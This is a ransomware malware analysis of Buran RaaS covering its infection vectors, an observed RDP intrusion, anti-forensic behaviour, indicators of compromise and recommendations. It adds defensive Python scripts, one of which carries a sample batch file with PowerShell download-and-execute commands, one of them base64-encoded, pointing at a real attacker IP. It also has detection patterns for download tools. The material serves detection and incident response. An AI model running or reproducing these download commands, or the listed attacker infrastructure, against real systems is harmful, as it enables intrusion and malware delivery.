Tue, Feb 18, 2020

Malware Analysis - Buran Ransomware-as-a-Service

Kroll analysts have been tracking Buran, one of numerous ransomware variants operating as a ransomware-as-a-service (RaaS) program, as it is advertised, updated and deployed against victims.

In September 2019, Kroll reported on Buran ransomware-as-a-service (RaaS) being offered on the top-tier Russian-language forum Exploit. Buran is one of numerous ransomware variants operating as a RaaS program; in Buran’s case, the affiliates who distribute the malware hand 25% of their ransom proceeds to the operator, “buransupport”, in exchange for the victim’s decryption key. In November 2019, the actors behind the “buransupport” moniker began advertising a second ransomware variant, Zeppelin, which has been observed to include data exfiltration capability. Kroll assesses that this feature may have been prompted by the tactics of other ransomware groups, which are actively publishing data stolen from victims who refuse to pay.

Since Buran’s launch, Kroll analysts have observed multiple updates to the ransomware advertised on dark web forums. In addition to distribution via the RIG exploit kit and malspam campaigns, Kroll incident responders have observed Buran being deployed after intrusions through misconfigured, internet-exposed Remote Desktop Protocol (RDP).

Buran is advertised as a fully offline crypto-locker (encryption requires no command-and-control connection) written in Delphi that claims to run on every Windows operating system from Windows XP/Windows Server 2003 onward. (See Figure 1 for a representative dark web listing.) Based on its tactics, techniques and procedures (TTPs), Buran is considered a variant of VegaLocker ransomware.

Attack Vector

Infection vectors vary with the specific version of Buran; the primary methods have been the RIG exploit kit¹ and malspam:

  • Version I was spread via CVE-2018-8174, a remote code execution (RCE) vulnerability in the Windows VBScript engine, reachable through Internet Explorer, that corrupts memory and allows an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited it would gain the same rights as that user, so the impact is greatest when the user is a local administrator.²

  • Version II was reported by open sources to be spread by various malspam campaigns:

    • One malspam campaign targeted German entities with an eFax-themed email carrying a malicious Microsoft Word document that downloaded the Buran payload.

    • Another campaign delivered Buran via Microsoft Excel Web Query (IQY) mail attachments, which make Excel fetch content from a remote URL when the file is opened.

    • Kroll assesses that the malspam campaigns distributing Buran and Maze ransomware may be connected, because the same email address appears in the Start of Authority (SOA) DNS records of domains used in multiple campaigns.

Kroll-Observed Attack Vector

Kroll incident response teams have observed the ransomware being deployed after RDP access coupled with privilege escalation. In one case, an organization’s RDP service was misconfigured to be reachable from the internet:

  • The attackers connected to the network via RDP over port 3389 from the IP address 98.110.78[.]226.

  • Once inside the network, the attackers connected 53 times from 14 unique IP addresses to three separate accounts.

  • One of the compromised RDP accounts established an FTP session to ftp://ftp.bit[.]nl/upload. The FTP connection occurred before any privilege escalation or network reconnaissance.

  • The FTP activity was followed by privilege escalation and network reconnaissance. Kroll assessed it likely that credential harvesting tools (e.g., Mimikatz) were run through the RDP sessions to capture credentials and reach administrator level.

  • Once the actor had administrator-level access, Buran was deployed (buran_2019-06-28_04-40[.]exe).
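The pattern above (dozens of sessions, many source addresses, a handful of accounts) is easy to surface from Windows Security logs once you filter successful logons (event 4624) of type 10 (RemoteInteractive, i.e. RDP) that come from outside your address space. The script below is an added example, not Kroll tooling or data from the incident: the 4624 records are constructed key=value lines (98.110.78.226 is the address the report names; the rest are documentation-range placeholders), and parse_event is the only part you would adapt to a real EVTX, Sysmon or SIEM export.

```python
"""Aggregate external RDP logons per account from constructed 4624 records."""
import ipaddress
import re
from collections import defaultdict

# Anything outside these ranges is treated as external. The IETF documentation
# ranges (198.51.100/24, 203.0.113/24) used in the sample therefore count as
# external; 98.110.78.226 is the source address the report names.
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed sample log, not data from the incident.
SAMPLE_4624 = """\
EventID=4624 LogonType=10 TargetUserName=svc_backup IpAddress=98.110.78.226
EventID=4624 LogonType=10 TargetUserName=svc_backup IpAddress=203.0.113.7
EventID=4624 LogonType=10 TargetUserName=jdoe IpAddress=203.0.113.7
EventID=4624 LogonType=10 TargetUserName=jdoe IpAddress=198.51.100.22
EventID=4624 LogonType=10 TargetUserName=helpdesk IpAddress=10.0.0.5
EventID=4624 LogonType=3 TargetUserName=jdoe IpAddress=203.0.113.7
EventID=4624 LogonType=10 TargetUserName=svc_backup IpAddress=98.110.78.226
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """key=value line -> dict. Adapt this for your export format."""
    return dict(KV.findall(line))


def is_external(ip):
    """True for any address outside the INTERNAL ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:  # real logs carry "-" or other placeholders here
        return False
    return not any(addr in net for net in INTERNAL)


def external_rdp_logons(text):
    """Successful (4624) RemoteInteractive (type 10) logons from external IPs."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if (ev.get("EventID") == "4624" and ev.get("LogonType") == "10"
                and "IpAddress" in ev and is_external(ev["IpAddress"])):
            hits.append(ev)
    return hits


def summarize(events):
    """Session count, distinct source IPs, and the IPs seen per account."""
    per_account = defaultdict(set)
    for ev in events:
        per_account[ev["TargetUserName"]].add(ev["IpAddress"])
    return {
        "sessions": len(events),
        "unique_ips": len({ev["IpAddress"] for ev in events}),
        "accounts": {a: sorted(ips) for a, ips in per_account.items()},
    }


def accounts_to_review(summary, min_sources=2):
    """Accounts reached over RDP from at least min_sources distinct external IPs."""
    return sorted(a for a, ips in summary["accounts"].items()
                  if len(ips) >= min_sources)


if __name__ == "__main__":
    s = summarize(external_rdp_logons(SAMPLE_4624))
    print(s["sessions"], "external RDP sessions from", s["unique_ips"], "IPs")
    print("accounts to review:", accounts_to_review(s))
```

An account with two or more distinct external sources in a short window is the signal worth paging on; a single external source is still a policy violation if RDP is not supposed to be exposed at all.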

In another Kroll investigation, the actor(s) cleared event logs and deleted Windows Volume Shadow Copy snapshots, making it difficult to ascertain the initial infection vector:

  • A batch file (def.bat) was executed that contained a PowerShell command to download from IP address 45.142.213.167, which geolocated to Russia at the time of the investigation.

    • PowerShell is a native component of Windows that administrators use routinely, so a malicious PowerShell script is less likely to be flagged than a dropped attacker binary.

  • Seconds later, the Buran binary was uploaded to the client’s Kaseya server through its web portal (/SystemTab/uploader.aspx).

  • The actor(s) then used the Kaseya remote management server to push tools and the ransomware to target systems.
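The def.bat stage is a download cradle: a one-line powershell invocation that fetches a second stage from a bare IP address. The following is an added example (not Kroll tooling and not the actor’s script) of scanning script text or process command lines for that shape; it decodes -EncodedCommand blobs first, because that is the usual way the cradle is hidden from simple string matching. The sample batch file is constructed; only the two URLs come from the IOC table, and the output path is made up.

```python
"""Flag powershell download cradles whose URL host is an IP literal."""
import base64
import re

# Download primitives commonly seen in cradles (not exhaustive).
CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|\bwget\b|\bcurl\b|Net\.WebClient|"
    r"Start-BitsTransfer|WebRequest\]::Create", re.I)
# URL whose host is a dotted-quad rather than a hostname.
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?[^\s'\"]*", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(line):
    """Return the line with any -EncodedCommand payload decoded and appended.
    PowerShell expects the blob to be base64 of UTF-16LE text."""
    extra = []
    for blob in ENCODED.findall(line):
        try:
            extra.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return line + " " + " ".join(extra) if extra else line


def find_cradles(script_text):
    """One finding per line that invokes powershell with a download primitive
    and an IP-literal URL (after decoding any encoded command)."""
    findings = []
    for n, raw in enumerate(script_text.splitlines(), 1):
        line = expand_encoded(raw)
        if "powershell" not in line.lower():
            continue
        url = IP_URL.search(line)
        if url and CRADLE.search(line):
            findings.append({"line": n, "ip": url.group(1), "url": url.group(0),
                             "encoded": line != raw})
    return findings


# Constructed sample modelled on the def.bat stage. The URLs are from the IOC
# table; the local file name is invented.
_PS = "IEX (New-Object Net.WebClient).DownloadString('http://45.142.213.167/reg')"
_B64 = base64.b64encode(_PS.encode("utf-16-le")).decode()
SAMPLE_BAT = (
    "@echo off\r\n"
    "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadFile('http://45.142.213.167/oxf','C:\\temp\\oxf.exe')\"\r\n"
    f"powershell -nop -w hidden -EncodedCommand {_B64}\r\n"
    "powershell -c \"Get-Service WinDefend\"\r\n"
)

if __name__ == "__main__":
    for hit in find_cradles(SAMPLE_BAT):
        print(hit)
```

Run the same function over the CommandLine field of process-creation events (Security 4688 with command-line auditing, or Sysmon event 1) to catch the cradle when it is typed interactively rather than dropped as a file; add `-EncodedCommand` with an IP-literal URL to your allow-list review either way, since legitimate administration almost never fetches code from a bare IP.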

Dark Web Updates

Kroll has observed that since first being advertised in May 2019, Buran has been updated on six separate occasions.

  • In a notable update in June 2019, Buran was enhanced to support a PowerShell script that contains the Buran bootloader. (See Figure 2 for the dark web update listing.)

  • The actor behind the “buransupport” moniker advertised a further update to Buran on January 16, 2020. No details were provided on the new features of that build.

  • “Buransupport” is also advertising a second ransomware variant, Zeppelin, which has been observed to have data exfiltration capabilities. Zeppelin was first advertised in November 2019 on Russian forums. Like Buran, it is a VegaLocker-family variant written in Delphi.

  • Zeppelin ransomware is extremely configurable and can be deployed as an EXE.

Startup and IOCs

  • Dark web advertisements for Buran claim the ransomware can scan local drives and network paths, delete recovery points and encrypt without changing file extensions.

  • Buran leverages several anti-forensic measures, such as clearing Windows event logs and disabling the Windows event log service prior to encrypting the victim host.

  • Numerous indicators of compromise exist for Buran. (See Figure 3 for a list of IOCs current as of this writing.)

  • Buran’s authors built in an abort feature: if a scan of the victim host finds it registered in one of the Commonwealth of Independent States (CIS) countries or Ukraine, the ransomware exits without encrypting.

  • Buran encrypts all files except those whose file name, extension or directory is on its exclusion list. Buran does not encrypt files with the following extensions: .bat, .buran, .cmd, .com, .cpl, .dll, .exe, .lnk, .log, .msc, .msp, .pif, .scr, .sys
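Two of the points above matter when scoping an incident: the extension skip list tells you which files Buran leaves alone (executables and scripts survive, so the host still boots and the note still displays), and the claim that it can encrypt without changing extensions means you cannot rely on a renamed-file sweep to find what was hit. The script below is an added example, not from the report or the malware: it applies the published skip list and falls back to a byte-entropy heuristic (assumption: a non-compressed file whose entropy approaches 8 bits/byte has been encrypted in place). The in-memory sample files are constructed.

```python
"""Triage which files Buran's stated rules would target and spot in-place
encryption that keeps the original extension."""
import math
import random
from collections import Counter

# The skip list printed in the report, lower-cased for case-insensitive matching.
EXCLUDED_EXT = {".bat", ".buran", ".cmd", ".com", ".cpl", ".dll", ".exe",
                ".lnk", ".log", ".msc", ".msp", ".pif", ".scr", ".sys"}


def is_excluded(path):
    """True if the file's extension is on Buran's published skip list."""
    dot = path.rfind(".")
    ext = path[dot:].lower() if dot != -1 else ""
    return ext in EXCLUDED_EXT


def shannon_entropy(data):
    """Bits per byte; 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(files, threshold=7.0):
    """files: {path: bytes}. Returns (would_be_targeted, suspected_encrypted),
    both sorted. Excluded extensions are never targets, so they are skipped
    before the entropy test."""
    targets, suspected = [], []
    for path, data in files.items():
        if is_excluded(path):
            continue
        targets.append(path)
        if shannon_entropy(data) >= threshold:
            suspected.append(path)
    return sorted(targets), sorted(suspected)


def sample_files():
    """Constructed sample set: one plaintext document, one document whose
    bytes have been replaced by ciphertext-like noise while keeping its
    .txt extension, and three files on the skip list."""
    rng = random.Random(1)  # seeded so results are reproducible
    cipherlike = bytes(rng.getrandbits(8) for _ in range(4096))
    return {
        r"C:\Users\finance\notes.txt": b"Q3 revenue figures and board notes.\n" * 100,
        r"C:\Users\finance\ledger.txt": cipherlike,
        r"C:\Windows\System32\kernel32.dll": b"MZ" + b"\x00" * 1000,
        r"C:\Users\finance\archive.buran": cipherlike,
        r"C:\temp\def.bat": b"@echo off\r\n",
    }


if __name__ == "__main__":
    targets, suspected = triage(sample_files())
    print("would be targeted:", targets)
    print("look encrypted in place:", suspected)
```

The entropy heuristic needs a baseline: .docx, .zip, .pdf streams and JPEGs are compressed and naturally score near 8, so for those formats check the magic bytes (a still-intact ZIP signature `PK` at offset 0 is a better "not encrypted" signal than entropy) rather than the threshold alone.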

Preemptive Recommendations

  • Maintain consistent backups. Recovery is always easier when an organization has a valid and intact backup. Offline backups, unreachable from the network, are far harder for an attacker who has gained administrator access to destroy.

  • Conduct routine security risk assessments, including vulnerability and penetration testing, to decrease the likelihood of infection.

  • Implement an endpoint monitoring, detection and response solution.

  • Use a firewall to block public access to Server Message Block (SMB, TCP port 445) and Remote Desktop Protocol (RDP, TCP port 3389).

  • Apply two-factor authentication (2FA) to user logons, and implement least privilege for file, directory and network share permissions.


Figure 1 – Buran listing on dark web


Figure 2 – Dark Web Listing, June 2019 Update to Buran Supporting PowerShell Bootloader

IOC | Type | Description
45.142.213.167 | IP address | Identified in bat.exe file; download attempt
hxxp://45.142.213.167/oxf | URL | URL hosted on 45.142.213.167
hxxp://45.142.213.167/reg | URL | URL hosted on 45.142.213.167
hxxp://192.119.68.225/wordupd1.tmp | Payload |
hxxp://108.174.199.10/wordupd3.tmp | Payload |
hxxp://54.39.233.175/wupd19823.tmp | Payload |
hxxp://54.39.233.131/word1.tmp | Payload |
def.exe | exe | Disables Windows Defender; hides the Control Panel; contacts 45.142.213.167; found in C:\temp
bat.exe | exe toolset | Actor toolset; found in C:\temp. SHA-256: c293aa92c1903c770eeb1b86b638467a3fd4058918880e33f73d96e05987825f
Advanced_Port_Scanner_2.5.3869.exe | exe | Port scanner, network reconnaissance tool
buran_2019-06-28_04-40.exe | exe | Buran ransomware
Everything.exe | exe | Windows system reconnaissance tool
load.exe | exe | Unknown, unrecoverable
lsass_2006.exe | exe | Unrecoverable; likely credential-stealing malware based on name
lsass_2206.exe | exe | Unrecoverable; likely credential-stealing malware based on name
mimikatz.exe | exe | Unrecoverable; likely credential-stealing malware based on name
Processhacker-2.39-setup.exe | exe | Process Hacker, Windows process auditing tool
Total-Uninstall-Setup-6.23.0.exe | exe | Total Uninstall application uninstaller tool
TUPortable_6.3.4.100_32bit_64bit_Multilingual.paf.exe | exe | Total Uninstall application uninstaller tool (portable)
unlocker.exe | exe | Windows file unlocking tool
Ilivenutm_trWorldwidepop&utm_source=307391625&utm_cost=0[.]0007 | |
filestake@tutanota[.]com | Email address |
polssh1@protonmail[.]com | Email address |
polsshprotonmail[.]com | Email address |
unique10@protonmail[.]com | Email address |
rizonlocker@airmail[.]cc | Email address |
realtime5@protonmail[.]com | Email address |
wtfsupport@airmail[.]cc | Email address |
wtfsupport@cock[.]li | Email address |
filestake@mailfence[.]com | Email address |
rizonlocker@firemail[.]cc | Email address |
61fd307906f8755516f0acd2e59c25dc | MD5 hash |
e60e767e33acf49c02568a79d9cbdadd | MD5 hash |
5c9fc92ab44374e1fdafd49808b2f638 | MD5 hash |
f88de5fc23b74f5066777e120232735f | MD5 hash |
55030a1c4072b1b0b3c33ba32003b8b5 | MD5 hash |
4266d31978d357c618c5839404850910 | MD5 hash |

Figure 3 - Indicators of Compromise (as of this alert)³

 

Sources
¹ An exploit kit (EK) is a toolkit designed to exploit security vulnerabilities in other software, typically browsers and their plugins, from a malicious or compromised web page.
² hxxps://fortiguard.com/encyclopedia/endpoint-vuln/57091
³ IOC information was obtained from multiple sources, including Kroll incident response data. Contact Kroll for more information on sourcing.


